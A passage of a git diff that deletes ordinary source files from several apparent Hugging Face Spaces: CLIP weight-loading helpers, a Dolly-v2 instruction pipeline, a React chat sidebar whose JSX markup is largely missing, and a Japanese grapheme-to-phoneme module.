k.startswith(f"visual.layer{b}"))) for b in [1, 2, 3, 4]] - vision_layers = tuple(counts) - vision_width = state_dict["visual.layer1.0.conv1.weight"].shape[0] - output_width = round((state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5) - vision_patch_size = None - assert output_width ** 2 + 1 == state_dict["visual.attnpool.positional_embedding"].shape[0] - image_size = output_width * 32 - - embed_dim = state_dict["text_projection"].shape[1] - context_length = state_dict["positional_embedding"].shape[0] - vocab_size = 
state_dict["token_embedding.weight"].shape[0] - transformer_width = state_dict["ln_final.weight"].shape[0] - transformer_heads = transformer_width // 64 - transformer_layers = len(set(k.split(".")[2] for k in state_dict if k.startswith(f"transformer.resblocks"))) - - vision_cfg = CLIPVisionCfg( - layers=vision_layers, - width=vision_width, - patch_size=vision_patch_size, - image_size=image_size, - ) - text_cfg = CLIPTextCfg( - context_length=context_length, - vocab_size=vocab_size, - width=transformer_width, - heads=transformer_heads, - layers=transformer_layers, - ) - model = CLIP( - embed_dim, - vision_cfg=vision_cfg, - text_cfg=text_cfg, - quick_gelu=quick_gelu, # OpenAI models were trained with QuickGELU - cast_dtype=cast_dtype, - ) - - for key in ["input_resolution", "context_length", "vocab_size"]: - state_dict.pop(key, None) - - convert_weights_to_fp16(model) # OpenAI state dicts are partially converted to float16 - model.load_state_dict(state_dict) - return model.eval() - - -def trace_model(model, batch_size=256, device=torch.device('cpu')): - model.eval() - image_size = model.visual.image_size - example_images = torch.ones((batch_size, 3, image_size, image_size), device=device) - example_text = torch.zeros((batch_size, model.context_length), dtype=torch.int, device=device) - model = torch.jit.trace_module( - model, - inputs=dict( - forward=(example_images, example_text), - encode_text=(example_text,), - encode_image=(example_images,) - )) - model.visual.image_size = image_size - return model - - -def resize_pos_embed(state_dict, model, interpolation: str = 'bicubic', antialias: bool = True): - # Rescale the grid of position embeddings when loading from state_dict - old_pos_embed = state_dict.get('visual.positional_embedding', None) - if old_pos_embed is None or not hasattr(model.visual, 'grid_size'): - return - grid_size = to_2tuple(model.visual.grid_size) - extra_tokens = 1 # FIXME detect different token configs (ie no class token, or more) - new_seq_len 
= grid_size[0] * grid_size[1] + extra_tokens - if new_seq_len == old_pos_embed.shape[0]: - return - - if extra_tokens: - pos_emb_tok, pos_emb_img = old_pos_embed[:extra_tokens], old_pos_embed[extra_tokens:] - else: - pos_emb_tok, pos_emb_img = None, old_pos_embed - old_grid_size = to_2tuple(int(math.sqrt(len(pos_emb_img)))) - - logging.info('Resizing position embedding grid-size from %s to %s', old_grid_size, grid_size) - pos_emb_img = pos_emb_img.reshape(1, old_grid_size[0], old_grid_size[1], -1).permute(0, 3, 1, 2) - pos_emb_img = F.interpolate( - pos_emb_img, - size=grid_size, - mode=interpolation, - antialias=antialias, - align_corners=False, - ) - pos_emb_img = pos_emb_img.permute(0, 2, 3, 1).reshape(1, grid_size[0] * grid_size[1], -1)[0] - if pos_emb_tok is not None: - new_pos_embed = torch.cat([pos_emb_tok, pos_emb_img], dim=0) - else: - new_pos_embed = pos_emb_img - state_dict['visual.positional_embedding'] = new_pos_embed diff --git a/spaces/Lenery/Dolly-v2/instruct_pipeline.py b/spaces/Lenery/Dolly-v2/instruct_pipeline.py deleted file mode 100644 index a62ed29bb0e2d666fa294438d1874707f381bbe6..0000000000000000000000000000000000000000 --- a/spaces/Lenery/Dolly-v2/instruct_pipeline.py +++ /dev/null @@ -1,158 +0,0 @@ -import logging -import re - -import numpy as np -from transformers import Pipeline, PreTrainedTokenizer - -logger = logging.getLogger(__name__) - -INSTRUCTION_KEY = "### Instruction:" -RESPONSE_KEY = "### Response:" -END_KEY = "### End" -INTRO_BLURB = ( - "Below is an instruction that describes a task. Write a response that appropriately completes the request." -) - -# This is the prompt that is used for generating responses using an already trained model. It ends with the response -# key, where the job of the model is to provide the completion that follows it (i.e. the response itself). 
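
The comment above describes the generation-time prompt. The `PROMPT_FOR_GENERATION_FORMAT` string uses a two-stage `.format` trick: the first call fills in the static pieces while re-inserting a literal `{instruction}` placeholder, which a later call fills with the user's instruction. A minimal standalone sketch of that pattern:

```python
# Mirrors the two-stage .format trick used by PROMPT_FOR_GENERATION_FORMAT.
INTRO_BLURB = (
    "Below is an instruction that describes a task. "
    "Write a response that appropriately completes the request."
)
INSTRUCTION_KEY = "### Instruction:"
RESPONSE_KEY = "### Response:"

template = "{intro}\n{instruction_key}\n{instruction}\n{response_key}\n".format(
    intro=INTRO_BLURB,
    instruction_key=INSTRUCTION_KEY,
    instruction="{instruction}",  # survives the first .format as a placeholder
    response_key=RESPONSE_KEY,
)

# Second stage: fill in the actual user instruction at generation time.
prompt = template.format(instruction="Name three primary colors.")
print(prompt)
```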
-PROMPT_FOR_GENERATION_FORMAT = """{intro} -{instruction_key} -{instruction} -{response_key} -""".format( - intro=INTRO_BLURB, - instruction_key=INSTRUCTION_KEY, - instruction="{instruction}", - response_key=RESPONSE_KEY, -) - - -def get_special_token_id(tokenizer: PreTrainedTokenizer, key: str) -> int: - """Gets the token ID for a given string that has been added to the tokenizer as a special token. - When training, we configure the tokenizer so that the sequences like "### Instruction:" and "### End" are - treated specially and converted to a single, new token. This retrieves the token ID each of these keys map to. - Args: - tokenizer (PreTrainedTokenizer): the tokenizer - key (str): the key to convert to a single token - Raises: - RuntimeError: if more than one ID was generated - Returns: - int: the token ID for the given key - """ - token_ids = tokenizer.encode(key) - if len(token_ids) > 1: - raise ValueError(f"Expected only a single token for '{key}' but found {token_ids}") - return token_ids[0] - - -class InstructionTextGenerationPipeline(Pipeline): - def __init__( - self, *args, do_sample: bool = True, max_new_tokens: int = 256, top_p: float = 0.92, top_k: int = 0, **kwargs - ): - super().__init__(*args, do_sample=do_sample, max_new_tokens=max_new_tokens, top_p=top_p, top_k=top_k, **kwargs) - - def _sanitize_parameters(self, return_instruction_text=False, **generate_kwargs): - preprocess_params = {} - - # newer versions of the tokenizer configure the response key as a special token. newer versions still may - # append a newline to yield a single token. find whatever token is configured for the response key. 
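
To illustrate the single-token contract that `get_special_token_id` enforces (the response key must have been registered as one special token), here is a sketch against a hypothetical stub tokenizer — `FakeTokenizer` is invented for the example and is not the real `transformers` API:

```python
# FakeTokenizer is a hypothetical stand-in: registered special tokens encode
# to a single ID; anything else encodes to one ID per character.
class FakeTokenizer:
    def __init__(self, special_tokens):
        self._special = {tok: 50000 + i for i, tok in enumerate(special_tokens)}

    def encode(self, text):
        if text in self._special:
            return [self._special[text]]
        return [ord(c) % 1000 for c in text]  # crude multi-token fallback

def get_special_token_id(tokenizer, key):
    token_ids = tokenizer.encode(key)
    if len(token_ids) > 1:
        raise ValueError(f"Expected only a single token for {key!r} but found {token_ids}")
    return token_ids[0]

tok = FakeTokenizer(["### Response:", "### End"])
rid = get_special_token_id(tok, "### Response:")
eid = get_special_token_id(tok, "### End")
print(rid, eid)  # 50000 50001
```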
- tokenizer_response_key = next( - (token for token in self.tokenizer.additional_special_tokens if token.startswith(RESPONSE_KEY)), None - ) - - response_key_token_id = None - end_key_token_id = None - if tokenizer_response_key: - try: - response_key_token_id = get_special_token_id(self.tokenizer, tokenizer_response_key) - end_key_token_id = get_special_token_id(self.tokenizer, END_KEY) - - # Ensure generation stops once it generates "### End" - generate_kwargs["eos_token_id"] = end_key_token_id - except ValueError: - pass - - forward_params = generate_kwargs - postprocess_params = { - "response_key_token_id": response_key_token_id, - "end_key_token_id": end_key_token_id, - "return_instruction_text": return_instruction_text, - } - - return preprocess_params, forward_params, postprocess_params - - def preprocess(self, instruction_text, **generate_kwargs): - prompt_text = PROMPT_FOR_GENERATION_FORMAT.format(instruction=instruction_text) - inputs = self.tokenizer( - prompt_text, - return_tensors="pt", - ) - inputs["prompt_text"] = prompt_text - inputs["instruction_text"] = instruction_text - return inputs - - def _forward(self, model_inputs, **generate_kwargs): - input_ids = model_inputs["input_ids"] - attention_mask = model_inputs.get("attention_mask", None) - generated_sequence = self.model.generate( - input_ids=input_ids.to(self.model.device), - attention_mask=attention_mask, - pad_token_id=self.tokenizer.pad_token_id, - **generate_kwargs, - )[0].cpu() - instruction_text = model_inputs.pop("instruction_text") - return {"generated_sequence": generated_sequence, "input_ids": input_ids, "instruction_text": instruction_text} - - def postprocess(self, model_outputs, response_key_token_id, end_key_token_id, return_instruction_text): - sequence = model_outputs["generated_sequence"] - instruction_text = model_outputs["instruction_text"] - - # The response will be set to this variable if we can identify it. 
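
The token-ID branch of `postprocess` below slices the generated sequence strictly between the response key and the end key. A pure-Python sketch of that slicing (list-based rather than numpy; the `is not None` check matters because position 0 is falsy but valid):

```python
# Sketch of the token-slicing branch: decode only the IDs strictly between
# the "### Response:" key and the "### End" key.
RESPONSE_ID, END_ID = 50277, 50278  # hypothetical special-token IDs

def extract_response_ids(sequence, response_id, end_id):
    positions = [i for i, t in enumerate(sequence) if t == response_id]
    response_pos = positions[0] if positions else None
    # `is not None`, not truthiness: a response key at index 0 is still valid.
    if response_pos is None:
        return None
    end_positions = [i for i, t in enumerate(sequence) if t == end_id]
    end_pos = end_positions[0] if end_positions else None
    # A None end_pos slices to the end of the sequence (truncated generation).
    return sequence[response_pos + 1 : end_pos]

generated = [10, 11, RESPONSE_ID, 7, 8, 9, END_ID, 0]
resp = extract_response_ids(generated, RESPONSE_ID, END_ID)
print(resp)  # [7, 8, 9]
```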
- decoded = None - - # If we have token IDs for the response and end, then we can find the tokens and only decode between them. - if response_key_token_id and end_key_token_id: - # Find where "### Response:" is first found in the generated tokens. Considering this is part of the - # prompt, we should definitely find it. We will return the tokens found after this token. - response_pos = None - response_positions = np.where(sequence == response_key_token_id)[0] - if len(response_positions) == 0: - logger.warning(f"Could not find response key {response_key_token_id} in: {sequence}") - else: - response_pos = response_positions[0] - - if response_pos is not None: - # Next find where "### End" is located. The model has been trained to end its responses with this - # sequence (or actually, the token ID it maps to, since it is a special token). We may not find - # this token, as the response could be truncated. If we don't find it then just return everything - # to the end. Note that even though we set eos_token_id, we still see this token at the end. - end_pos = None - end_positions = np.where(sequence == end_key_token_id)[0] - if len(end_positions) > 0: - end_pos = end_positions[0] - - decoded = self.tokenizer.decode(sequence[response_pos + 1 : end_pos]).strip() - else: - # Otherwise we'll decode everything and use a regex to find the response and end. - - fully_decoded = self.tokenizer.decode(sequence) - - # The response appears after "### Response:". The model has been trained to append "### End" at the - # end. - m = re.search(r"#+\s*Response:\s*(.+?)#+\s*End", fully_decoded, flags=re.DOTALL) - - if m: - decoded = m.group(1).strip() - else: - # The model might not generate the "### End" sequence before reaching the max tokens. In this case, - # return everything after "### Response:". 
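
The regex fallback sketched in the comments above can be isolated into a small helper: first try to capture the text between `### Response:` and `### End`, then tolerate a missing end marker when generation was truncated. A standalone sketch:

```python
import re

def extract_response_text(fully_decoded: str):
    # Preferred: response delimited by "### Response:" ... "### End".
    m = re.search(r"#+\s*Response:\s*(.+?)#+\s*End", fully_decoded, flags=re.DOTALL)
    if m:
        return m.group(1).strip()
    # Truncated generation: take everything after "### Response:".
    m = re.search(r"#+\s*Response:\s*(.+)", fully_decoded, flags=re.DOTALL)
    return m.group(1).strip() if m else None

full = "### Instruction:\nSay hi.\n### Response:\nHello!\n### End"
truncated = "### Instruction:\nSay hi.\n### Response:\nHello, I was cut o"
print(extract_response_text(full))       # Hello!
print(extract_response_text(truncated))  # Hello, I was cut o
```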
- m = re.search(r"#+\s*Response:\s*(.+)", fully_decoded, flags=re.DOTALL) - if m: - decoded = m.group(1).strip() - else: - logger.warn(f"Failed to find response in:\n{fully_decoded}") - - if return_instruction_text: - return {"instruction_text": instruction_text, "generated_text": decoded} - - return decoded diff --git a/spaces/LuxOAI/ChatGpt-Web/app/components/sidebar.tsx b/spaces/LuxOAI/ChatGpt-Web/app/components/sidebar.tsx deleted file mode 100644 index c54d93097adeea5deeba005ff6c8b2bc3e6871e0..0000000000000000000000000000000000000000 --- a/spaces/LuxOAI/ChatGpt-Web/app/components/sidebar.tsx +++ /dev/null @@ -1,205 +0,0 @@ -import { useEffect, useRef } from "react"; - -import styles from "./home.module.scss"; - -import { IconButton } from "./button"; -import SettingsIcon from "../icons/settings.svg"; -import GithubIcon from "../icons/github.svg"; -import ChatGptIcon from "../icons/chatgpt.svg"; -import AddIcon from "../icons/add.svg"; -import CloseIcon from "../icons/close.svg"; -import MaskIcon from "../icons/mask.svg"; -import PluginIcon from "../icons/plugin.svg"; - -import Locale from "../locales"; - -import { useAppConfig, useChatStore } from "../store"; - -import { - MAX_SIDEBAR_WIDTH, - MIN_SIDEBAR_WIDTH, - NARROW_SIDEBAR_WIDTH, - Path, - REPO_URL, -} from "../constant"; - -import { Link, useNavigate } from "react-router-dom"; -import { useMobileScreen } from "../utils"; -import dynamic from "next/dynamic"; -import { showToast } from "./ui-lib"; - -const ChatList = dynamic(async () => (await import("./chat-list")).ChatList, { - loading: () => null, -}); - -function useHotKey() { - const chatStore = useChatStore(); - - useEffect(() => { - const onKeyDown = (e: KeyboardEvent) => { - if (e.metaKey || e.altKey || e.ctrlKey) { - const n = chatStore.sessions.length; - const limit = (x: number) => (x + n) % n; - const i = chatStore.currentSessionIndex; - if (e.key === "ArrowUp") { - chatStore.selectSession(limit(i - 1)); - } else if (e.key === "ArrowDown") { - 
chatStore.selectSession(limit(i + 1)); - } - } - }; - - window.addEventListener("keydown", onKeyDown); - return () => window.removeEventListener("keydown", onKeyDown); - }); -} - -function useDragSideBar() { - const limit = (x: number) => Math.min(MAX_SIDEBAR_WIDTH, x); - - const config = useAppConfig(); - const startX = useRef(0); - const startDragWidth = useRef(config.sidebarWidth ?? 300); - const lastUpdateTime = useRef(Date.now()); - - const handleMouseMove = useRef((e: MouseEvent) => { - if (Date.now() < lastUpdateTime.current + 50) { - return; - } - lastUpdateTime.current = Date.now(); - const d = e.clientX - startX.current; - const nextWidth = limit(startDragWidth.current + d); - config.update((config) => (config.sidebarWidth = nextWidth)); - }); - - const handleMouseUp = useRef(() => { - startDragWidth.current = config.sidebarWidth ?? 300; - window.removeEventListener("mousemove", handleMouseMove.current); - window.removeEventListener("mouseup", handleMouseUp.current); - }); - - const onDragMouseDown = (e: MouseEvent) => { - startX.current = e.clientX; - - window.addEventListener("mousemove", handleMouseMove.current); - window.addEventListener("mouseup", handleMouseUp.current); - }; - const isMobileScreen = useMobileScreen(); - const shouldNarrow = - !isMobileScreen && config.sidebarWidth < MIN_SIDEBAR_WIDTH; - - useEffect(() => { - const barWidth = shouldNarrow - ? NARROW_SIDEBAR_WIDTH - : limit(config.sidebarWidth ?? 300); - const sideBarWidth = isMobileScreen ? "100vw" : `${barWidth}px`; - document.documentElement.style.setProperty("--sidebar-width", sideBarWidth); - }, [config.sidebarWidth, isMobileScreen, shouldNarrow]); - - return { - onDragMouseDown, - shouldNarrow, - }; -} - -export function SideBar(props: { className?: string }) { - const chatStore = useChatStore(); - - // drag side bar - const { onDragMouseDown, shouldNarrow } = useDragSideBar(); - const navigate = useNavigate(); - - const config = useAppConfig(); - useHotKey(); - - return ( -
    -
    -
    - ChatGPT Next【{config.bot}】 -
    -
    必应暂不支持上下文
    -
    - -
    -
    - -
    - } - text={shouldNarrow ? undefined : Locale.Mask.Name} - className={styles["sidebar-bar-button"]} - onClick={() => navigate(Path.NewChat, { state: { fromHome: true } })} - shadow - /> - } - text={shouldNarrow ? undefined : Locale.Plugin.Name} - className={styles["sidebar-bar-button"]} - onClick={() => showToast(Locale.WIP)} - shadow - /> -
    - -
    { - if (e.target === e.currentTarget) { - navigate(Path.Home); - } - }} - > - -
    - -
    -
    -
    - } - onClick={() => { - if (confirm(Locale.Home.DeleteChat)) { - chatStore.deleteSession(chatStore.currentSessionIndex); - } - }} - /> -
    -
    - - } shadow /> - -
    - -
    -
    - } - text={shouldNarrow ? undefined : Locale.Home.NewChat} - onClick={() => { - if (config.dontShowMaskSplashScreen) { - chatStore.newSession(); - navigate(Path.Chat); - } else { - navigate(Path.NewChat); - } - }} - shadow - /> -
    -
    - -
    onDragMouseDown(e as any)} - >
    -
    - ); -} diff --git a/spaces/Mahiruoshi/BangDream-Bert-VITS2/text/japanese.py b/spaces/Mahiruoshi/BangDream-Bert-VITS2/text/japanese.py deleted file mode 100644 index 53db38b7349af5a117f81314304d69796c0daf81..0000000000000000000000000000000000000000 --- a/spaces/Mahiruoshi/BangDream-Bert-VITS2/text/japanese.py +++ /dev/null @@ -1,586 +0,0 @@ -# Convert Japanese text to phonemes which is -# compatible with Julius https://github.com/julius-speech/segmentation-kit -import re -import unicodedata - -from transformers import AutoTokenizer - -from text import punctuation, symbols - -try: - import MeCab -except ImportError as e: - raise ImportError("Japanese requires mecab-python3 and unidic-lite.") from e -from num2words import num2words - -_CONVRULES = [ - # Conversion of 2 letters - "アァ/ a a", - "イィ/ i i", - "イェ/ i e", - "イャ/ y a", - "ウゥ/ u:", - "エェ/ e e", - "オォ/ o:", - "カァ/ k a:", - "キィ/ k i:", - "クゥ/ k u:", - "クャ/ ky a", - "クュ/ ky u", - "クョ/ ky o", - "ケェ/ k e:", - "コォ/ k o:", - "ガァ/ g a:", - "ギィ/ g i:", - "グゥ/ g u:", - "グャ/ gy a", - "グュ/ gy u", - "グョ/ gy o", - "ゲェ/ g e:", - "ゴォ/ g o:", - "サァ/ s a:", - "シィ/ sh i:", - "スゥ/ s u:", - "スャ/ sh a", - "スュ/ sh u", - "スョ/ sh o", - "セェ/ s e:", - "ソォ/ s o:", - "ザァ/ z a:", - "ジィ/ j i:", - "ズゥ/ z u:", - "ズャ/ zy a", - "ズュ/ zy u", - "ズョ/ zy o", - "ゼェ/ z e:", - "ゾォ/ z o:", - "タァ/ t a:", - "チィ/ ch i:", - "ツァ/ ts a", - "ツィ/ ts i", - "ツゥ/ ts u:", - "ツャ/ ch a", - "ツュ/ ch u", - "ツョ/ ch o", - "ツェ/ ts e", - "ツォ/ ts o", - "テェ/ t e:", - "トォ/ t o:", - "ダァ/ d a:", - "ヂィ/ j i:", - "ヅゥ/ d u:", - "ヅャ/ zy a", - "ヅュ/ zy u", - "ヅョ/ zy o", - "デェ/ d e:", - "ドォ/ d o:", - "ナァ/ n a:", - "ニィ/ n i:", - "ヌゥ/ n u:", - "ヌャ/ ny a", - "ヌュ/ ny u", - "ヌョ/ ny o", - "ネェ/ n e:", - "ノォ/ n o:", - "ハァ/ h a:", - "ヒィ/ h i:", - "フゥ/ f u:", - "フャ/ hy a", - "フュ/ hy u", - "フョ/ hy o", - "ヘェ/ h e:", - "ホォ/ h o:", - "バァ/ b a:", - "ビィ/ b i:", - "ブゥ/ b u:", - "フャ/ hy a", - "ブュ/ by u", - "フョ/ hy o", - "ベェ/ b e:", - "ボォ/ b o:", - "パァ/ p a:", - "ピィ/ p i:", - "プゥ/ p u:", - "プャ/ py 
a", - "プュ/ py u", - "プョ/ py o", - "ペェ/ p e:", - "ポォ/ p o:", - "マァ/ m a:", - "ミィ/ m i:", - "ムゥ/ m u:", - "ムャ/ my a", - "ムュ/ my u", - "ムョ/ my o", - "メェ/ m e:", - "モォ/ m o:", - "ヤァ/ y a:", - "ユゥ/ y u:", - "ユャ/ y a:", - "ユュ/ y u:", - "ユョ/ y o:", - "ヨォ/ y o:", - "ラァ/ r a:", - "リィ/ r i:", - "ルゥ/ r u:", - "ルャ/ ry a", - "ルュ/ ry u", - "ルョ/ ry o", - "レェ/ r e:", - "ロォ/ r o:", - "ワァ/ w a:", - "ヲォ/ o:", - "ディ/ d i", - "デェ/ d e:", - "デャ/ dy a", - "デュ/ dy u", - "デョ/ dy o", - "ティ/ t i", - "テェ/ t e:", - "テャ/ ty a", - "テュ/ ty u", - "テョ/ ty o", - "スィ/ s i", - "ズァ/ z u a", - "ズィ/ z i", - "ズゥ/ z u", - "ズャ/ zy a", - "ズュ/ zy u", - "ズョ/ zy o", - "ズェ/ z e", - "ズォ/ z o", - "キャ/ ky a", - "キュ/ ky u", - "キョ/ ky o", - "シャ/ sh a", - "シュ/ sh u", - "シェ/ sh e", - "ショ/ sh o", - "チャ/ ch a", - "チュ/ ch u", - "チェ/ ch e", - "チョ/ ch o", - "トゥ/ t u", - "トャ/ ty a", - "トュ/ ty u", - "トョ/ ty o", - "ドァ/ d o a", - "ドゥ/ d u", - "ドャ/ dy a", - "ドュ/ dy u", - "ドョ/ dy o", - "ドォ/ d o:", - "ニャ/ ny a", - "ニュ/ ny u", - "ニョ/ ny o", - "ヒャ/ hy a", - "ヒュ/ hy u", - "ヒョ/ hy o", - "ミャ/ my a", - "ミュ/ my u", - "ミョ/ my o", - "リャ/ ry a", - "リュ/ ry u", - "リョ/ ry o", - "ギャ/ gy a", - "ギュ/ gy u", - "ギョ/ gy o", - "ヂェ/ j e", - "ヂャ/ j a", - "ヂュ/ j u", - "ヂョ/ j o", - "ジェ/ j e", - "ジャ/ j a", - "ジュ/ j u", - "ジョ/ j o", - "ビャ/ by a", - "ビュ/ by u", - "ビョ/ by o", - "ピャ/ py a", - "ピュ/ py u", - "ピョ/ py o", - "ウァ/ u a", - "ウィ/ w i", - "ウェ/ w e", - "ウォ/ w o", - "ファ/ f a", - "フィ/ f i", - "フゥ/ f u", - "フャ/ hy a", - "フュ/ hy u", - "フョ/ hy o", - "フェ/ f e", - "フォ/ f o", - "ヴァ/ b a", - "ヴィ/ b i", - "ヴェ/ b e", - "ヴォ/ b o", - "ヴュ/ by u", - # Conversion of 1 letter - "ア/ a", - "イ/ i", - "ウ/ u", - "エ/ e", - "オ/ o", - "カ/ k a", - "キ/ k i", - "ク/ k u", - "ケ/ k e", - "コ/ k o", - "サ/ s a", - "シ/ sh i", - "ス/ s u", - "セ/ s e", - "ソ/ s o", - "タ/ t a", - "チ/ ch i", - "ツ/ ts u", - "テ/ t e", - "ト/ t o", - "ナ/ n a", - "ニ/ n i", - "ヌ/ n u", - "ネ/ n e", - "ノ/ n o", - "ハ/ h a", - "ヒ/ h i", - "フ/ f u", - "ヘ/ h e", - "ホ/ h o", - "マ/ m a", - "ミ/ m i", - "ム/ m u", - "メ/ m e", - 
"モ/ m o", - "ラ/ r a", - "リ/ r i", - "ル/ r u", - "レ/ r e", - "ロ/ r o", - "ガ/ g a", - "ギ/ g i", - "グ/ g u", - "ゲ/ g e", - "ゴ/ g o", - "ザ/ z a", - "ジ/ j i", - "ズ/ z u", - "ゼ/ z e", - "ゾ/ z o", - "ダ/ d a", - "ヂ/ j i", - "ヅ/ z u", - "デ/ d e", - "ド/ d o", - "バ/ b a", - "ビ/ b i", - "ブ/ b u", - "ベ/ b e", - "ボ/ b o", - "パ/ p a", - "ピ/ p i", - "プ/ p u", - "ペ/ p e", - "ポ/ p o", - "ヤ/ y a", - "ユ/ y u", - "ヨ/ y o", - "ワ/ w a", - "ヰ/ i", - "ヱ/ e", - "ヲ/ o", - "ン/ N", - "ッ/ q", - "ヴ/ b u", - "ー/:", - # Try converting broken text - "ァ/ a", - "ィ/ i", - "ゥ/ u", - "ェ/ e", - "ォ/ o", - "ヮ/ w a", - "ォ/ o", - # Symbols - "、/ ,", - "。/ .", - "!/ !", - "?/ ?", - "・/ ,", -] - -_COLON_RX = re.compile(":+") -_REJECT_RX = re.compile("[^ a-zA-Z:,.?]") - - -def _makerulemap(): - l = [tuple(x.split("/")) for x in _CONVRULES] - return tuple({k: v for k, v in l if len(k) == i} for i in (1, 2)) - - -_RULEMAP1, _RULEMAP2 = _makerulemap() - - -def kata2phoneme(text: str) -> str: - """Convert katakana text to phonemes.""" - text = text.strip() - res = [] - while text: - if len(text) >= 2: - x = _RULEMAP2.get(text[:2]) - if x is not None: - text = text[2:] - res += x.split(" ")[1:] - continue - x = _RULEMAP1.get(text[0]) - if x is not None: - text = text[1:] - res += x.split(" ")[1:] - continue - res.append(text[0]) - text = text[1:] - # res = _COLON_RX.sub(":", res) - return res - - -_KATAKANA = "".join(chr(ch) for ch in range(ord("ァ"), ord("ン") + 1)) -_HIRAGANA = "".join(chr(ch) for ch in range(ord("ぁ"), ord("ん") + 1)) -_HIRA2KATATRANS = str.maketrans(_HIRAGANA, _KATAKANA) - - -def hira2kata(text: str) -> str: - text = text.translate(_HIRA2KATATRANS) - return text.replace("う゛", "ヴ") - - -_SYMBOL_TOKENS = set(list("・、。?!")) -_NO_YOMI_TOKENS = set(list("「」『』―()[][]")) -_TAGGER = MeCab.Tagger() - - -def text2kata(text: str) -> str: - parsed = _TAGGER.parse(text) - res = [] - for line in parsed.split("\n"): - if line == "EOS": - break - parts = line.split("\t") - - word, yomi = parts[0], parts[1] - if 
yomi: - res.append(yomi) - else: - if word in _SYMBOL_TOKENS: - res.append(word) - elif word in ("っ", "ッ"): - res.append("ッ") - elif word in _NO_YOMI_TOKENS: - pass - else: - res.append(word) - return hira2kata("".join(res)) - - -_ALPHASYMBOL_YOMI = { - "#": "シャープ", - "%": "パーセント", - "&": "アンド", - "+": "プラス", - "-": "マイナス", - ":": "コロン", - ";": "セミコロン", - "<": "小なり", - "=": "イコール", - ">": "大なり", - "@": "アット", - "a": "エー", - "b": "ビー", - "c": "シー", - "d": "ディー", - "e": "イー", - "f": "エフ", - "g": "ジー", - "h": "エイチ", - "i": "アイ", - "j": "ジェー", - "k": "ケー", - "l": "エル", - "m": "エム", - "n": "エヌ", - "o": "オー", - "p": "ピー", - "q": "キュー", - "r": "アール", - "s": "エス", - "t": "ティー", - "u": "ユー", - "v": "ブイ", - "w": "ダブリュー", - "x": "エックス", - "y": "ワイ", - "z": "ゼット", - "α": "アルファ", - "β": "ベータ", - "γ": "ガンマ", - "δ": "デルタ", - "ε": "イプシロン", - "ζ": "ゼータ", - "η": "イータ", - "θ": "シータ", - "ι": "イオタ", - "κ": "カッパ", - "λ": "ラムダ", - "μ": "ミュー", - "ν": "ニュー", - "ξ": "クサイ", - "ο": "オミクロン", - "π": "パイ", - "ρ": "ロー", - "σ": "シグマ", - "τ": "タウ", - "υ": "ウプシロン", - "φ": "ファイ", - "χ": "カイ", - "ψ": "プサイ", - "ω": "オメガ", -} - - -_NUMBER_WITH_SEPARATOR_RX = re.compile("[0-9]{1,3}(,[0-9]{3})+") -_CURRENCY_MAP = {"$": "ドル", "¥": "円", "£": "ポンド", "€": "ユーロ"} -_CURRENCY_RX = re.compile(r"([$¥£€])([0-9.]*[0-9])") -_NUMBER_RX = re.compile(r"[0-9]+(\.[0-9]+)?") - - -def japanese_convert_numbers_to_words(text: str) -> str: - res = _NUMBER_WITH_SEPARATOR_RX.sub(lambda m: m[0].replace(",", ""), text) - res = _CURRENCY_RX.sub(lambda m: m[2] + _CURRENCY_MAP.get(m[1], m[1]), res) - res = _NUMBER_RX.sub(lambda m: num2words(m[0], lang="ja"), res) - return res - - -def japanese_convert_alpha_symbols_to_words(text: str) -> str: - return "".join([_ALPHASYMBOL_YOMI.get(ch, ch) for ch in text.lower()]) - - -def japanese_text_to_phonemes(text: str) -> str: - """Convert Japanese text to phonemes.""" - res = unicodedata.normalize("NFKC", text) - res = japanese_convert_numbers_to_words(res) - # res = 
japanese_convert_alpha_symbols_to_words(res) - res = text2kata(res) - res = kata2phoneme(res) - return res - - -def is_japanese_character(char): - # 定义日语文字系统的 Unicode 范围 - japanese_ranges = [ - (0x3040, 0x309F), # 平假名 - (0x30A0, 0x30FF), # 片假名 - (0x4E00, 0x9FFF), # 汉字 (CJK Unified Ideographs) - (0x3400, 0x4DBF), # 汉字扩展 A - (0x20000, 0x2A6DF), # 汉字扩展 B - # 可以根据需要添加其他汉字扩展范围 - ] - - # 将字符的 Unicode 编码转换为整数 - char_code = ord(char) - - # 检查字符是否在任何一个日语范围内 - for start, end in japanese_ranges: - if start <= char_code <= end: - return True - - return False - - -rep_map = { - ":": ",", - ";": ",", - ",": ",", - "。": ".", - "!": "!", - "?": "?", - "\n": ".", - "·": ",", - "、": ",", - "...": "…", -} - - -def replace_punctuation(text): - pattern = re.compile("|".join(re.escape(p) for p in rep_map.keys())) - - replaced_text = pattern.sub(lambda x: rep_map[x.group()], text) - - replaced_text = re.sub( - r"[^\u3040-\u309F\u30A0-\u30FF\u4E00-\u9FFF\u3400-\u4DBF" - + "".join(punctuation) - + r"]+", - "", - replaced_text, - ) - - return replaced_text - - -def text_normalize(text): - res = unicodedata.normalize("NFKC", text) - res = japanese_convert_numbers_to_words(res) - # res = "".join([i for i in res if is_japanese_character(i)]) - res = replace_punctuation(res) - return res - - -def distribute_phone(n_phone, n_word): - phones_per_word = [0] * n_word - for task in range(n_phone): - min_tasks = min(phones_per_word) - min_index = phones_per_word.index(min_tasks) - phones_per_word[min_index] += 1 - return phones_per_word - - -tokenizer = AutoTokenizer.from_pretrained("./bert/bert-base-japanese-v3") - - -def g2p(norm_text): - tokenized = tokenizer.tokenize(norm_text) - phs = [] - ph_groups = [] - for t in tokenized: - if not t.startswith("#"): - ph_groups.append([t]) - else: - ph_groups[-1].append(t.replace("#", "")) - word2ph = [] - for group in ph_groups: - phonemes = kata2phoneme(text2kata("".join(group))) - # phonemes = [i for i in phonemes if i in symbols] - for i in phonemes: - 
